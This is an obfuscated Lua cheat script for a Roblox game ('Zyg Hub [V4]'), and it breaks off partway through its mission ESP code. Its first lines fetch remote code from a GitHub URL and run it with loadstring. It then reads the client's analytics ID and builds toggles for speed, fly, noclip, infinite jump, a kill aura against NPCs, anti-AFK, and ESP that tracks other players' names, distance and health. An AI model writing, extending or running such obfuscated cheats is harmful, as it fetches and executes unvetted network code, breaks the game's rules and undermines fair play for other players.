( function (...) if _IIllIlIlII and _IIllIlIlII.Unload then _IIllIlIlII:Unload() end
 local _lIlIllIlll = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\118\105\111\108\105\110\045\115\117\122\117\116\115\117\107\105\047\076\105\110\111\114\105\097\076\105\098\047\109\097\105\110\047" local _IIllIlIlII = loadstring(game:HttpGet(_lIlIllIlll .. "\076\105\098\114\097\114\121\046\108\117\097"))() local _IllIIIlIIl = loadstring(game:HttpGet(_lIlIllIlll .. "\097\100\100\111\110\115\047\084\104\101\109\101\077\097\110\097\103\101\114\046\108\117\097"))() local _IlIlIlIIII = loadstring(game:HttpGet(_lIlIllIlll .. "\097\100\100\111\110\115\047\083\097\118\101\077\097\110\097\103\101\114\046\108\117\097"))() local _llIlIlIIlI = game:GetService("\082\098\120\065\110\097\108\121\116\105\099\115\083\101\114\118\105\099\101"):GetClientId() local _IllIIIIlIl = _IIllIlIlII:CreateWindow({ Title = "\090\121\103\032\072\117\098\032\091\086\052\093\032\123" .. _llIlIlIIlI .. "\125", Center = true, AutoShow = true, TabPadding = 0x8, MenuFadeTime = 0.2 }) local _IIIIIlIlll = { Main = _IllIIIIlIl:AddTab("\077\097\105\110"), ["\069\083\080"] = _IllIIIIlIl:AddTab("\069\083\080"), ["\065\100\100\105\116\105\111\110\115"] = _IllIIIIlIl:AddTab("\065\100\100\105\116\105\111\110\115"), ["\085\073\032\083\101\116\116\105\110\103\115"] = _IllIIIIlIl:AddTab("\085\073\032\083\101\116\116\105\110\103\115"), } local _lIIIlllIII: any = _IIIIIlIlll["\077\097\105\110"]:AddLeftGroupbox("\077\097\105\110\032\083\099\114\105\112\116\115") local RunService = game:GetService("\082\117\110\083\101\114\118\105\099\101") local _IlllllllIl = game:GetService("\067\111\108\108\101\099\116\105\111\110\083\101\114\118\105\099\101") local Players = game:GetService("\080\108\097\121\101\114\115") local _IllIlIIIlI local _IlIIlIllll local _IIIlIIIIIl = false local _IlllIlIIll = 0x10 local function _lllIlIIlII(_lIIlIlIlll) local _lIlllllIII = Players.LocalPlayer local _IlIlIllIlI = _lIlllllIII and _lIlllllIII.Character local _IIIIlIlllI = _IlIlIllIlI and _IlIlIllIlI:FindFirstChildOfClass("\072\117\109\097\110\111\105\100") local _IIlIlllllI = _IlIlIllIlI and _IlIlIllIlI:FindFirstChild("\072\117\109\097\110\111\105\100\082\111\111\116\080\097\114\116") if _lIIlIlIlll then if not _IIIlIIIIIl and _IIIIlIlllI and _IIlIlllllI then _IlIIlIllll = Instance.new("\066\111\100\121\086\101\108\111\099\105\116\121") _IlIIlIllll.MaxForce = Vector3.new(0x186A0, 0x0, 0x186A0) _IlIIlIllll.Velocity = Vector3.new(0x0, 0x0, 0x0) _IlllllllIl:AddTag(_IlIIlIllll, "\065\108\108\111\119\101\100\066\077") _IlIIlIllll.Parent = _IIlIlllllI _IllIlIIIlI = RunService.Heartbeat:Connect( function () local _lllllIIlIl = _IIIIlIlllI.MoveDirection if _lllllIIlIl.Magnitude > 0x0 then _IlIIlIllll.Velocity = _lllllIIlIl * _IlllIlIIll else _IlIIlIllll.Velocity = Vector3.new(0x0, 0x0, 0x0) end
 end
 ) _IIIlIIIIIl = true end
 else if _IllIlIIIlI then _IllIlIIIlI:Disconnect() _IllIlIIIlI = nil end
 if _IlIIlIllll then _IlIIlIllll:Destroy() _IlIIlIllll = nil end
 _IIIlIIIIIl = false end
 end
 _lIIIlllIII:AddToggle("\083\112\101\101\100\072\097\099\107", { Text = "\087\097\108\107\115\112\101\101\100", Default = false, Tooltip = "\069\110\097\098\108\101\115\032\099\117\115\116\111\109\032\119\097\108\107\115\112\101\101\100", Callback = function (NewValue) _lllIlIIlII(NewValue) end
 }):AddKeyPicker("\083\112\101\101\100\072\097\099\107\075\101\121\098\105\110\100", { Default = '', Mode = "\084\111\103\103\108\101", Text = "\087\097\108\107\115\112\101\101\100\032\075\101\121\098\105\110\100", NoUI = false }) _lIIIlllIII:AddSlider("\083\112\101\101\100\086\097\108\117\101", { Text = "\080\111\119\101\114", Default = 0x10, Min = 0x0, Max = 0x113, Rounding = 0x0, Compact = true, Callback = function (NewValue) _IlllIlIIll = NewValue end
 }) _G.ScriptEnabled = false _G.HackedJumpPower = 0x32 _lIIIlllIII:AddToggle("\074\117\109\112\080\111\119\101\114\084\111\103\103\108\101", { Text = "\074\117\109\112\032\080\111\119\101\114", Default = false, Tooltip = "\069\110\097\098\108\101\115\032\099\117\115\116\111\109\032\106\117\109\112\032\112\111\119\101\114", Callback = function (Value) _G.ScriptEnabled = Value end
 }):AddKeyPicker("\074\117\109\112\080\111\119\101\114\075\101\121\098\105\110\100", { Default = '', Mode = "\084\111\103\103\108\101", Text = "\074\117\109\112\032\080\111\119\101\114\032\075\101\121\098\105\110\100", NoUI = false }) _lIIIlllIII:AddSlider("\074\117\109\112\080\111\119\101\114\086\097\108\117\101", { Text = "\080\111\119\101\114", Default = 0x32, Min = 0x0, Max = 0x113, Rounding = 0x0, Compact = true, Callback = function (Value) _G.HackedJumpPower = Value end
 }) local _IIIlIllIll = game:GetService("\080\108\097\121\101\114\115") local _lllIIIlIIl = _IIIlIllIll.LocalPlayer local function _IIlIIlllII(Humanoid) if _G.ScriptEnabled then Humanoid.JumpPower = _G.HackedJumpPower end
 end
 local function _IlIIlIlIII(Char) repeat wait() until Char:FindFirstChild("\072\117\109\097\110\111\105\100") local _IllIIIIIII = Char:WaitForChild("\072\117\109\097\110\111\105\100") _IllIIIIIII.Changed:Connect( function () _IIlIIlllII(_IllIIIIIII) end
 ) _IIlIIlllII(_IllIIIIIII) end
 if _lllIIIlIIl.Character then _IlIIlIlIII(_lllIIIlIIl.Character) end
 _lllIIIlIIl.CharacterAdded:Connect(_IlIIlIlIII) _lIIIlllIII:AddDivider() local _llIIIlllIl = game:GetService("\085\115\101\114\073\110\112\117\116\083\101\114\118\105\099\101") local RunService = game:GetService("\082\117\110\083\101\114\118\105\099\101") local Players = game:GetService("\080\108\097\121\101\114\115") local _llIlIIIIII = Players.LocalPlayer local _IllIlIIlll = _llIlIIIIII.Character or _llIlIIIIII.CharacterAdded:Wait() local _IIIlIlllII = workspace.CurrentCamera local _IllllIIlIl = false local _lllIlIlIlI = 0xC8 local _IIllIlIlll = { ["\119"] = 0x0, ["\097"] = 0x0, ["\115"] = 0x0, ["\100"] = 0x0, ["\115\112\097\099\101"] = 0x0, ["\108\101\102\116\099\111\110\116\114\111\108"] = 0x0 } local function _lIllIlIIII() _IllIlIIlll = _llIlIIIIII.Character or _llIlIIIIII.CharacterAdded:Wait() RunService.RenderStepped:Connect( function () if _IllllIIlIl and _IllIlIIlll and _IllIlIIlll:FindFirstChild("\072\117\109\097\110\111\105\100\082\111\111\116\080\097\114\116") then local _lllIIlIIlI = _IllIlIIlll.HumanoidRootPart _lllIIlIIlI.Anchored = false local _lIlIlllIII = _lllIIlIIlI:FindFirstChild("\070\108\121\080\111\115\105\116\105\111\110") if not _lIlIlllIII then _lIlIlllIII = Instance.new("\066\111\100\121\080\111\115\105\116\105\111\110") _lIlIlllIII.Name = "\070\108\121\080\111\115\105\116\105\111\110" _lIlIlllIII.MaxForce = Vector3.new(1e6, 1e6, 1e6) _lIlIlllIII.D = 0x3E8 _lIlIlllIII.P = 0x1388 _lIlIlllIII.Parent = _lllIIlIIlI end
 local _llIIIIlIII = (_IIllIlIlll["\115\112\097\099\101"] - _IIllIlIlll["\108\101\102\116\099\111\110\116\114\111\108"]) * _lllIlIlIlI local _lIlIlllIIl = ((_IIIlIlllII.CFrame.LookVector * (_IIllIlIlll["\119"] - _IIllIlIlll["\115"])) + ((_IIIlIlllII.CFrame * CFrame.new(-_IIllIlIlll["\097"] + _IIllIlIlll["\100"], 0x0, 0x0).Position) - _IIIlIlllII.CFrame.Position)) * _lllIlIlIlI / 1.5 _lIlIlllIII.Position = _lllIIlIIlI.Position + _lIlIlllIIl + Vector3.new(0x0, _llIIIIlIII, 0x0) end
 end
 ) end
 _llIIIlllIl.InputBegan:Connect( function (input, gpe) if _IIllIlIlll[input.KeyCode.Name:lower()] ~= nil then _IIllIlIlll[input.KeyCode.Name:lower()] = 0x1 end
 end
 ) _llIIIlllIl.InputEnded:Connect( function (input, gpe) if _IIllIlIlll[input.KeyCode.Name:lower()] ~= nil then _IIllIlIlll[input.KeyCode.Name:lower()] = 0x0 end
 end
 ) _lIIIlllIII:AddToggle("\070\108\121\084\111\103\103\108\101", { Text = "\070\108\121", Default = false, Tooltip = "\084\111\103\103\108\101\032\070\108\121\032\111\110\032\097\110\100\032\079\102\102", Callback = function (Value) _IllllIIlIl = Value if _IllIlIIlll and _IllIlIIlll:FindFirstChild("\072\117\109\097\110\111\105\100\082\111\111\116\080\097\114\116") then local _lllIIlIIlI = _IllIlIIlll.HumanoidRootPart if _IllllIIlIl then if not _lllIIlIIlI:FindFirstChild("\070\108\121\080\111\115\105\116\105\111\110") then local _lIlIlllIII = Instance.new("\066\111\100\121\080\111\115\105\116\105\111\110") _lIlIlllIII.Name = "\070\108\121\080\111\115\105\116\105\111\110" _lIlIlllIII.MaxForce = Vector3.new(1e6, 1e6, 1e6) _lIlIlllIII.D = 0x3E8 _lIlIlllIII.P = 0x1388 _lIlIlllIII.Parent = _lllIIlIIlI end
 else local _lIlIlllIII = _lllIIlIIlI:FindFirstChild("\070\108\121\080\111\115\105\116\105\111\110") if _lIlIlllIII then _lIlIlllIII:Destroy() end
 end
 end
 end
 }):AddKeyPicker("\070\108\121\075\101\121\098\105\110\100", { Default = '', Mode = "\084\111\103\103\108\101", Text = "\070\108\121\032\075\101\121\098\105\110\100", NoUI = false }) _lIIIlllIII:AddSlider("\070\108\121\083\112\101\101\100\083\108\105\100\101\114", { Text = "\070\108\121\032\083\112\101\101\100", Default = 0xC8, Min = 0x0, Max = 0x3E8, Rounding = 0x0, Compact = true, Callback = function (Value) _lllIlIlIlI = Value end
 }) _lIllIlIIII() _llIlIIIIII.CharacterAdded:Connect( function () _IllIlIIlll = _llIlIIIIII.Character or _llIlIIIIII.CharacterAdded:Wait() _lIllIlIIII() end
 ) _lIIIlllIII:AddDivider() local _llllIIIlII = false local _llIlIIIIII = game.Players.LocalPlayer local RunService = game:GetService("\082\117\110\083\101\114\118\105\099\101") local _IlIlllIIll local _lIIllIIIIl = {} local function _lIIIlllIII() for _, v in pairs(_llIlIIIIII.Character:GetDescendants()) do if v:IsA("\066\097\115\101\080\097\114\116") then _lIIllIIIIl[v] = v.CanCollide end
 end
 _IlIlllIIll = RunService.Stepped:Connect( function () if _llllIIIlII then for _, v in pairs(_llIlIIIIII.Character:GetDescendants()) do if v:IsA("\066\097\115\101\080\097\114\116") and v.CanCollide then v.CanCollide = false end
 end
 end
 end
 ) end
 local function _lIIIllIlIl() if _IlIlllIIll then _IlIlllIIll:Disconnect() _IlIlllIIll = nil end
 for _, v in pairs(_llIlIIIIII.Character:GetDescendants()) do if v:IsA("\066\097\115\101\080\097\114\116") and _lIIllIIIIl[v] ~= nil then v.CanCollide = _lIIllIIIIl[v] end
 end
 _lIIllIIIIl = {} end
 _lIIIlllIII:AddToggle("\078\111\067\108\105\112\084\111\103\103\108\101", { Text = "\078\111\067\108\105\112", Default = _llllIIIlII, Tooltip = '', Callback = function (NewValue) _llllIIIlII = NewValue if _llllIIIlII then _lIIIlllIII() else _lIIIllIlIl() end
 end
 }):AddKeyPicker("\078\111\067\108\105\112\075\101\121\098\105\110\100", { Default = '', Mode = "\084\111\103\103\108\101", Text = "\078\111\032\067\108\105\112\032\075\101\121\098\105\110\100", NoUI = false }) local _llIlIIIIII = game:GetService"\080\108\097\121\101\114\115".LocalPlayer local _llIIIlllIl = game:GetService"\085\115\101\114\073\110\112\117\116\083\101\114\118\105\099\101" local _llllIlllIl = false function Action(Object, Function) if Object ~= nil then Function(Object); end
 end
 _llIIIlllIl.InputBegan:Connect( function (UserInput) if _llllIlllIl and UserInput.UserInputType == Enum.UserInputType.Keyboard and UserInput.KeyCode == Enum.KeyCode.Space then Action(_llIlIIIIII.Character and _llIlIIIIII.Character:FindFirstChild("\072\117\109\097\110\111\105\100"), function (self) if self:GetState() == Enum.HumanoidStateType.Jumping or self:GetState() == Enum.HumanoidStateType.Freefall then Action(self.Parent:FindFirstChild("\072\117\109\097\110\111\105\100\082\111\111\116\080\097\114\116"), function (self) self.Velocity = Vector3.new(0x0, _G.HackedJumpPower, 0x0) end
 ) end
 end
 ) end
 end
 ) _lIIIlllIII:AddToggle("\073\110\102\032\074\117\109\112", { Text = "\073\110\102\105\110\105\116\101\032\074\117\109\112", Default = false, Tooltip = "\065\108\108\111\119\115\032\121\111\117\032\116\111\032\106\117\109\112\032\105\110\102\105\110\105\116\101\108\121", Callback = function (Value) _llllIlllIl = Value end
 }):AddKeyPicker("\073\110\102\074\117\109\112\075\101\121\098\105\110\100", { Default = '', Mode = "\084\111\103\103\108\101", Text = "\073\110\102\105\110\105\116\101\032\074\117\109\112\032\075\101\121\098\105\110\100", NoUI = false }) local _lIIIlllIII = _IIIIIlIlll["\077\097\105\110"]:AddLeftGroupbox("\086\105\115\117\097\108\115") _lIIIlllIII:AddToggle("\070\117\108\108\066\114\105\103\104\116", { Text = "\070\117\108\108\098\114\105\103\104\116", Default = false, Callback = function (Value) if not _G.FullBrightExecuted then _G.FullBrightEnabled = false _G.NormalLightingSettings = { Brightness = game:GetService("\076\105\103\104\116\105\110\103").Brightness, ClockTime = game:GetService("\076\105\103\104\116\105\110\103").ClockTime, FogEnd = game:GetService("\076\105\103\104\116\105\110\103").FogEnd, GlobalShadows = game:GetService("\076\105\103\104\116\105\110\103").GlobalShadows, Ambient = game:GetService("\076\105\103\104\116\105\110\103").Ambient } game:GetService("\076\105\103\104\116\105\110\103"):GetPropertyChangedSignal("\066\114\105\103\104\116\110\101\115\115"):Connect( function () if game:GetService("\076\105\103\104\116\105\110\103").Brightness ~= 0x1 and game:GetService("\076\105\103\104\116\105\110\103").Brightness ~= _G.NormalLightingSettings.Brightness then _G.NormalLightingSettings.Brightness = game:GetService("\076\105\103\104\116\105\110\103").Brightness if not _G.FullBrightEnabled then repeat wait() until _G.FullBrightEnabled end
 game:GetService("\076\105\103\104\116\105\110\103").Brightness = 0x1 end
 end
 ) game:GetService("\076\105\103\104\116\105\110\103"):GetPropertyChangedSignal("\067\108\111\099\107\084\105\109\101"):Connect( function () if game:GetService("\076\105\103\104\116\105\110\103").ClockTime ~= 0xC and game:GetService("\076\105\103\104\116\105\110\103").ClockTime ~= _G.NormalLightingSettings.ClockTime then _G.NormalLightingSettings.ClockTime = game:GetService("\076\105\103\104\116\105\110\103").ClockTime if not _G.FullBrightEnabled then repeat wait() until _G.FullBrightEnabled end
 game:GetService("\076\105\103\104\116\105\110\103").ClockTime = 0xC end
 end
 ) game:GetService("\076\105\103\104\116\105\110\103"):GetPropertyChangedSignal("\070\111\103\069\110\100"):Connect( function () if game:GetService("\076\105\103\104\116\105\110\103").FogEnd ~= 0xC006F and game:GetService("\076\105\103\104\116\105\110\103").FogEnd ~= _G.NormalLightingSettings.FogEnd then _G.NormalLightingSettings.FogEnd = game:GetService("\076\105\103\104\116\105\110\103").FogEnd if not _G.FullBrightEnabled then repeat wait() until _G.FullBrightEnabled end
 game:GetService("\076\105\103\104\116\105\110\103").FogEnd = 0xC006F end
 end
 ) game:GetService("\076\105\103\104\116\105\110\103"):GetPropertyChangedSignal("\071\108\111\098\097\108\083\104\097\100\111\119\115"):Connect( function () if game:GetService("\076\105\103\104\116\105\110\103").GlobalShadows ~= false and game:GetService("\076\105\103\104\116\105\110\103").GlobalShadows ~= _G.NormalLightingSettings.GlobalShadows then _G.NormalLightingSettings.GlobalShadows = game:GetService("\076\105\103\104\116\105\110\103").GlobalShadows if not _G.FullBrightEnabled then repeat wait() until _G.FullBrightEnabled end
 game:GetService("\076\105\103\104\116\105\110\103").GlobalShadows = false end
 end
 ) game:GetService("\076\105\103\104\116\105\110\103"):GetPropertyChangedSignal("\065\109\098\105\101\110\116"):Connect( function () if game:GetService("\076\105\103\104\116\105\110\103").Ambient ~= Color3.fromRGB(0xB2, 0xB2, 0xB2) and game:GetService("\076\105\103\104\116\105\110\103").Ambient ~= _G.NormalLightingSettings.Ambient then _G.NormalLightingSettings.Ambient = game:GetService("\076\105\103\104\116\105\110\103").Ambient if not _G.FullBrightEnabled then repeat wait() until _G.FullBrightEnabled end
 game:GetService("\076\105\103\104\116\105\110\103").Ambient = Color3.fromRGB(0xB2, 0xB2, 0xB2) end
 end
 ) game:GetService("\076\105\103\104\116\105\110\103").Brightness = 0x1 game:GetService("\076\105\103\104\116\105\110\103").ClockTime = 0xC game:GetService("\076\105\103\104\116\105\110\103").FogEnd = 0xC006F game:GetService("\076\105\103\104\116\105\110\103").GlobalShadows = false game:GetService("\076\105\103\104\116\105\110\103").Ambient = Color3.fromRGB(0xB2, 0xB2, 0xB2) local _llIllllIlI = true spawn( function () repeat wait() until _G.FullBrightEnabled while wait() do if _G.FullBrightEnabled ~= _llIllllIlI then if not _G.FullBrightEnabled then game:GetService("\076\105\103\104\116\105\110\103").Brightness = _G.NormalLightingSettings.Brightness game:GetService("\076\105\103\104\116\105\110\103").ClockTime = _G.NormalLightingSettings.ClockTime game:GetService("\076\105\103\104\116\105\110\103").FogEnd = _G.NormalLightingSettings.FogEnd game:GetService("\076\105\103\104\116\105\110\103").GlobalShadows = _G.NormalLightingSettings.GlobalShadows game:GetService("\076\105\103\104\116\105\110\103").Ambient = _G.NormalLightingSettings.Ambient else game:GetService("\076\105\103\104\116\105\110\103").Brightness = 0x1 game:GetService("\076\105\103\104\116\105\110\103").ClockTime = 0xC game:GetService("\076\105\103\104\116\105\110\103").FogEnd = 0xC006F game:GetService("\076\105\103\104\116\105\110\103").GlobalShadows = false game:GetService("\076\105\103\104\116\105\110\103").Ambient = Color3.fromRGB(0xB2, 0xB2, 0xB2) end
 _llIllllIlI = not _llIllllIlI end
 end
 end
 ) end
 _G.FullBrightExecuted = true _G.FullBrightEnabled = not _G.FullBrightEnabled end
 }) _lIIIlllIII:AddToggle("\078\111\032\070\111\103", { Text = "\078\111\032\070\111\103", Default = false, Callback = function (Value) local Lighting = game:GetService("\076\105\103\104\116\105\110\103") local _lIIlIlIlll = false local function _IlllIIIIlI() if _lIIlIlIlll then Lighting.FogEnd = 0x186A0 Lighting:GetPropertyChangedSignal("\070\111\103\069\110\100"):Connect( function () if _lIIlIlIlll then Lighting.FogEnd = 0x186A0 end
 end
 ) for _, v in ipairs(Lighting:GetDescendants()) do if v:IsA("\065\116\109\111\115\112\104\101\114\101") then v.Density = 0x0 v:GetPropertyChangedSignal("\068\101\110\115\105\116\121"):Connect( function () if _lIIlIlIlll then v.Density = 0x0 end
 end
 ) end
 end
 else Lighting.FogEnd = 0x0 for _, v in ipairs(Lighting:GetDescendants()) do if v:IsA("\065\116\109\111\115\112\104\101\114\101") then v.Density = 0x1 end
 end
 end
 end
 _IlllIIIIlI() local function _IllIIIIllI() _lIIlIlIlll = not _lIIlIlIlll _IlllIIIIlI() end
 _IllIIIIllI() end
 }) local _lIIIlllIII = _IIIIIlIlll["\077\097\105\110"]:AddLeftGroupbox("\070\097\114\109\115") local Players = game:GetService("\080\108\097\121\101\114\115") local _IIIIlIIIll = Players.LocalPlayer local _IllIlIIlll = _IIIIlIIIll.Character or _IIIIlIIIll.CharacterAdded:Wait() local _lIIIIllIIl = false local _IIIIlIlIll = 0x0 local function _IIIllIllIl() while _lIIIIllIIl do local _IlIIllllIl = _IllIlIIlll:FindFirstChild("\072\117\109\097\110\111\105\100\082\111\111\116\080\097\114\116") if _IlIIllllIl then for _, mob in pairs(workspace.npc:GetChildren()) do if mob:IsA("\077\111\100\101\108") and mob ~= _IllIlIIlll then if mob.Name:sub(0x1, 0x3) == "\110\112\099" and mob.Name ~= "\108\111\103\116\114\097\105\110\105\110\103" then local _IIIIlIlllI = mob:FindFirstChild("\072\117\109\097\110\111\105\100") local _IIlIlllllI = mob:FindFirstChild("\072\117\109\097\110\111\105\100\082\111\111\116\080\097\114\116") if _IIIIlIlllI and _IIlIlllllI then local _lIlllllIII = (_IlIIllllIl.Position - _IIlIlllllI.Position).Magnitude if _lIlllllIII <= _IIIIlIlIll then _IIIIlIlllI.Health = 0x0 end
 end
 end
 end
 end
 end
 task.wait(0.25) end
 end
 _lIIIlllIII:AddToggle("\075\105\108\108\065\117\114\097\084\111\103\103\108\101", { Text = "\075\105\108\108\032\065\117\114\097", Default = false, Callback = function (Value) _lIIIIllIIl = Value if _lIIIIllIIl then task.spawn(_IIIllIllIl) end
 end
 }) _lIIIlllIII:AddSlider("\075\105\108\108\065\117\114\097\082\097\100\105\117\115", { Text = "\075\105\108\108\032\082\097\100\105\117\115", Default = 0x0, Min = 0x0, Max = 0x3E8, Rounding = 0x0, Callback = function (Value) _IIIIlIlIll = Value end
 }) local _lllIIIIlIl = _IIIIIlIlll["\077\097\105\110"]:AddRightGroupbox("\077\105\115\099") _lllIIIIlIl:AddToggle("\077\121\084\111\103\103\108\101", { Text = "\065\110\116\105\032\065\070\075", Default = false, Callback = function (Value) local _llIIlllIlI = game:GetService("\086\105\114\116\117\097\108\085\115\101\114") local _lIlllllIII = game:GetService("\080\108\097\121\101\114\115").LocalPlayer local _lIIIIllllI = false local function _IIIlIllIIl() _lIIIIllllI = not _lIIIIllllI if _lIIIIllllI then _lIlllllIII.Idled:Connect( function () _llIIlllIlI:Button2Down(Vector2.new(0x0,0x0), workspace.CurrentCamera.CFrame) wait(0x1) _llIIlllIlI:Button2Up(Vector2.new(0x0,0x0), workspace.CurrentCamera.CFrame) end
 ) else _lIlllllIII.Idled:Disconnect() end
 end
 _IIIlIllIIl() end
 }) Toggles.MyToggle:OnChanged( function () end
 ) Toggles.MyToggle:SetValue(false) local Players = game:GetService("\080\108\097\121\101\114\115") local _lIlllllIII = Players.LocalPlayer local _IlIlIllIlI = _lIlllllIII.Character or _lIlllllIII.CharacterAdded:Wait() local _lIlIIIlIlI = _IlIlIllIlI:WaitForChild("\072\117\109\097\110\111\105\100\082\111\111\116\080\097\114\116") local _IlllllIIII local _IIlllIIIll local _IIIlIIllll local _llIllIlIII = false local function _lIlllIlIII() _IlllllIIII = Instance.new("\083\099\114\101\101\110\071\117\105") _IlllllIIII.Name = "\080\114\111\120\105\109\105\116\121\065\108\101\114\116" _IlllllIIII.Parent = _lIlllllIII.PlayerGui _IIlllIIIll = Instance.new("\084\101\120\116\076\097\098\101\108") _IIlllIIIll.Size = UDim2.new(0x0, 0x12C, 0x0, 0x1E) _IIlllIIIll.Position = UDim2.new(0.5, -0x96, 0x0, 0x32) _IIlllIIIll.BackgroundTransparency = 0x1 _IIlllIIIll.TextColor3 = Color3.new(0x1, 0x1, 0x1) _IIlllIIIll.Font = Enum.Font.SourceSans _IIlllIIIll.TextScaled = true _IIlllIIIll.Visible = false _IIlllIIIll.Parent = _IlllllIIII _IIIlIIllll = Instance.new("\084\101\120\116\076\097\098\101\108") _IIIlIIllll.Size = UDim2.new(0x0, 0x12C, 0x0, 0x1E) _IIIlIIllll.Position = UDim2.new(0.5, -0x96, 0x0, 0x50) _IIIlIIllll.BackgroundTransparency = 0x1 _IIIlIIllll.TextColor3 = Color3.new(0x1, 0x1, 0x1) _IIIlIIllll.Font = Enum.Font.SourceSans _IIIlIIllll.TextScaled = true _IIIlIIllll.Visible = false _IIIlIIllll.Parent = _IlllllIIII end
 local function _IIlIlllllI() if _IlllllIIII then _IlllllIIII:Destroy() _IlllllIIII = nil _IIlllIIIll = nil _IIIlIIllll = nil end
 end
 local function _IlIlllIlIl() if not _llIllIlIII or not _IlllllIIII then return end
 local _llIllllIlI = nil local _IllIllIlIl = math.huge for _, otherPlayer in ipairs(Players:GetPlayers()) do if otherPlayer ~= _lIlllllIII and otherPlayer.Character and otherPlayer.Character:FindFirstChild("\072\117\109\097\110\111\105\100\082\111\111\116\080\097\114\116") then local _lIllIIIlll = otherPlayer.Character.HumanoidRootPart local _lIlllllIII = (_lIlIIIlIlI.Position - _lIllIIIlll.Position).Magnitude if _lIlllllIII <= 0x1F4 and _lIlllllIII < _IllIllIlIl then _llIllllIlI = otherPlayer _IllIllIlIl = _lIlllllIII end
 end
 end
 if _llIllllIlI then _IIlllIIIll.Text = "\080\108\097\121\101\114\058\032" .. _llIllllIlI.Name _IIIlIIllll.Text = "\068\105\115\116\097\110\099\101\058\032" .. math.floor(_IllIllIlIl) .. "\032\115\116\117\100\115" _IIlllIIIll.Visible = true _IIIlIIllll.Visible = true else _IIlllIIIll.Visible = false _IIIlIIllll.Visible = false end
 end
 local function _lllllIIllI(state) _llIllIlIII = state if _llIllIlIII then _lIlllIlIII() else _IIlIlllllI() end
 end
 game:GetService("\082\117\110\083\101\114\118\105\099\101").RenderStepped:Connect( function () if _llIllIlIII then _IlIlllIlIl() end
 end
 ) _lllIIIIlIl:AddToggle("\077\121\084\111\103\103\108\101", { Text = "\080\114\111\120\105\109\105\116\121\032\080\114\111\109\112\116", Default = false, Tooltip = "\073\102\032\097\032\112\108\097\121\101\114\032\105\115\032\099\108\111\115\101\032\116\111\032\121\111\117\044\032\097\032\071\085\073\032\115\104\111\119\115", Callback = function (Value) _lllllIIllI(Value) end
 }) local _lIIIlllIII = _IIIIIlIlll["\069\083\080"]:AddLeftGroupbox("\080\108\097\121\101\114\032\069\083\080") _lIIIlllIII:AddToggle("\080\108\097\121\101\114\032\069\083\080", { Text = "\069\110\097\098\108\101", Default = false, Callback = function (Value) if _G.espEnabled == nil then _G.espEnabled = false end
 local function _IlIlIlllIl() _G.espEnabled = not _G.espEnabled if not _G.espEnabled then for _, _lIlllllIII in ipairs(game.Players:GetPlayers()) do if _lIlllllIII.Character and _lIlllllIII.Character:FindFirstChild("\072\101\097\100") then local _lIIIlIIllI = _lIlllllIII.Character.Head:FindFirstChild("\090\121\103\072\117\098\086\052\069\083\080\084\097\103\115") if _lIIIlIIllI then _lIIIlIIllI:Destroy() end
 end
 end
 end
 end
 local function _lIllIIIIlI() if not _G.espEnabled then return end
 local _IllIIlIlll = game.Players.LocalPlayer.Character if not _IllIIlIlll then return end
 for _, _lIlllllIII in ipairs(game.Players:GetPlayers()) do if _lIlllllIII ~= game.Players.LocalPlayer and _lIlllllIII.Character and _lIlllllIII.Character:FindFirstChild("\072\101\097\100") then local _lIlllllIII = (_IllIIlIlll.Head.Position - _lIlllllIII.Character.Head.Position).Magnitude local _lIIIlIIllI = _lIlllllIII.Character.Head:FindFirstChild("\090\121\103\072\117\098\086\052\069\083\080\084\097\103\115") local _IIIIlIlllI = _lIlllllIII.Character:FindFirstChildOfClass("\072\117\109\097\110\111\105\100") if not _IIIIlIlllI then continue end
 local _lIIlllIIll = math.floor(_IIIIlIlllI.Health) local _lIlIlIlllI = math.floor(_IIIIlIlllI.MaxHealth) if not _lIIIlIIllI then _lIIIlIIllI = Instance.new("\066\105\108\108\098\111\097\114\100\071\117\105") _lIIIlIIllI.Name = "\090\121\103\072\117\098\086\052\069\083\080\084\097\103\115" _lIIIlIIllI.Adornee = _lIlllllIII.Character.Head _lIIIlIIllI.Size = UDim2.new(0x0, 0x64, 0x0, 0x32) _lIIIlIIllI.StudsOffset = Vector3.new(0x0, 0x2, 0x0) _lIIIlIIllI.AlwaysOnTop = true _lIIIlIIllI.LightInfluence = 0x1 _lIIIlIIllI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling _lIIIlIIllI.Parent = _lIlllllIII.Character.Head local _IIIlIIIllI = Instance.new("\084\101\120\116\076\097\098\101\108") _IIIlIIIllI.Name = "\078\097\109\101\076\097\098\101\108" _IIIlIIIllI.Text = _lIlllllIII.Name .. "\092\110\068\105\115\116\097\110\099\101\058\032" .. math.floor(_lIlllllIII) .. "\092\110\072\080\058\032" .. _lIIlllIIll .. "\047" .. _lIlIlIlllI _IIIlIIIllI.Size = UDim2.new(0x1, 0x0, 0x1, 0x0) _IIIlIIIllI.BackgroundTransparency = 0x1 _IIIlIIIllI.TextColor3 = Color3.new(0x1, 0x0, 0x0) _IIIlIIIllI.TextScaled = true _IIIlIIIllI.TextStrokeColor3 = Color3.new(0x0, 0x0, 0x0) _IIIlIIIllI.TextStrokeTransparency = 0x0 _IIIlIIIllI.Visible = true _IIIlIIIllI.Parent = _lIIIlIIllI else _lIIIlIIllI.NameLabel.Text = _lIlllllIII.Name .. "\092\110\068\105\115\116\097\110\099\101\058\032" .. math.floor(_lIlllllIII) .. "\092\110\072\080\058\032" .. _lIIlllIIll .. "\047" .. _lIlIlIlllI end
 end
 end
 end
 if not _G.espConnection then _G.espConnection = game:GetService("\082\117\110\083\101\114\118\105\099\101").Heartbeat:Connect( function () _lIllIIIIlI() end
 ) end
 _IlIlIlllIl() end
 }) local _lIIIlllIII = _IIIIIlIlll["\069\083\080"]:AddLeftGroupbox("\077\105\115\115\105\111\110\032\069\083\080") _lIIIlllIII:AddToggle("\077\105\115\115\105\111\110\032\069\083\080", { Text = "\069\110\097\098\108\101", Default = false, Callback = function (Value) _G.MissionESPEnabled = Value for _, v in pairs(workspace.bossdropmission.missions:GetChildren()) do if v:FindFirstChild("\109\105\115\115\105\111\110\103\105\118\101\114") and v.missiongiver:FindFirstChild("\084\097\108\107") then local _lIIllIlIll = v.missiongiver local _llIlIIllIl = _lIIllIlIll:FindFirstChild("\087\097\118\101\077\105\115\115\105\111\110\069\083\080") if Value then if not _llIlIIllIl then local _IlIllIlllI = Instance.new("\066\105\108\108\098\111\097\114\100\071\117\105") _IlIllIlllI.Name = "\087\097\118\101\077\105\115\115\105\111\110\069\083\080" _IlIllIlllI.Adornee = _lIIllIlIll 